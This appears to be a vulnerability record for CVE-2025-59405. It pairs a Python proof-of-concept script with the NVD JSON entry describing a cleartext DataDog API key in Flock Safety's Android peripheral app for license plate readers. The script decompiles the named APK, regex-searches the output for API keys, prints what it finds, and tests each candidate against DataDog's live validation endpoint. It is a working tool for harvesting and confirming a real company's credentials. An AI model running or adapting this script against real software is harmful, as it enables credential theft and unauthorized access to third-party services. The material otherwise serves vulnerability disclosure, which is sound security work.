CVE-2025-59405

# CVE-2025-59405 PoC - Extracting Hardcoded DataDog API Key from Flock Safety Peripheral APK # This PoC demonstrates how to extract the cleartext DataDog API key from the APK import subprocess import re import sys import os APK_FILE = "com.flocksafety.android.peripheral_7.38.3.apk" OUTPUT_DIR = "decompiled_output" def decompile_apk(apk_path, output_dir): """Decompile APK using apktool and jadx""" # Step 1: Use apktool to extract resources and smali code print("[*] Decompiling APK with apktool...") subprocess.run(["apktool", "d", "-f", apk_path, "-o", f"{output_dir}/apktool"], check=True) # Step 2: Use jadx to decompile to Java source print("[*] Decompiling APK with jadx...") subprocess.run(["jadx", "-d", f"{output_dir}/jadx", apk_path], check=True) print(f"[+] Decompilation complete. Output: {output_dir}/") def search_api_key(search_dir): """Search for hardcoded DataDog API key in decompiled source""" print("[*] Searching for DataDog API key patterns...") # Common patterns for DataDog API keys patterns = [ r'DD_API_KEY\s*=\s*["\']([a-f0-9]{32,})["\']', r'datadog.*api[_-]?key\s*[=:]\s*["\']([^"\']+)["\']', r'Authorization.*Datadog\s+([a-zA-Z0-9]{32,})', r'"([a-f0-9]{40})"', # DataDog API keys are typically 32-40 char hex strings ] found_keys = [] for root, dirs, files in os.walk(search_dir): for file in files: if file.endswith((".java", ".smali", ".kt", ".xml", ".json", ".properties")): filepath = os.path.join(root, file) try: with open(filepath, 'r', errors='ignore') as f: content = f.read() for pattern in patterns: matches = re.findall(pattern, content, re.IGNORECASE) for match in matches: print(f"[+] Found potential API key in {filepath}: {match}") found_keys.append({"file": filepath, "key": match}) except Exception: pass return found_keys def validate_key_with_datadog(api_key): """Validate extracted API key against DataDog API""" import requests print(f"[*] Validating API key against DataDog API...") url = "https://api.datadoghq.com/api/v1/validate" headers = {"DD-API-KEY": api_key} try: resp = requests.get(url, headers=headers, timeout=10) if resp.status_code == 200: data = resp.json() if data.get("valid"): print(f"[+] VALID DataDog API Key confirmed!") print(f" Key: {api_key}") return True print(f"[-] Key validation failed: {resp.status_code}") except Exception as e: print(f"[-] Error validating key: {e}") return False if __name__ == "__main__": if not os.path.exists(APK_FILE): print(f"[!] APK file not found: {APK_FILE}") sys.exit(1) decompile_apk(APK_FILE, OUTPUT_DIR) keys = search_api_key(OUTPUT_DIR) if keys: print(f"\n[!] Extracted {len(keys)} potential API key(s)") for key_info in keys: validate_key_with_datadog(key_info["key"]) else: print("[-] No API keys found")

{"cve": {"id": "CVE-2025-59405", "sourceIdentifier": "[email protected]", "published": "2025-10-02T17:16:06.243", "lastModified": "2025-10-24T17:27:51.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flock Safety Peripheral com.flocksafety.android.peripheral application 7.38.3 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) contains a cleartext DataDog API key within in its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover the OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flocksafety:flock_safety:7.38.3:*:*:*:*:android:*:*", "matchCriteriaId": "43976607-119F-4E37-8DB6-DF55D5C3F92C"}]}]}], "references": [{"url": "https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.flocksafety.com/products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.flocksafety.com/products/license-plate-readers", "source": "[email protected]", "tags": ["Product"]}]}}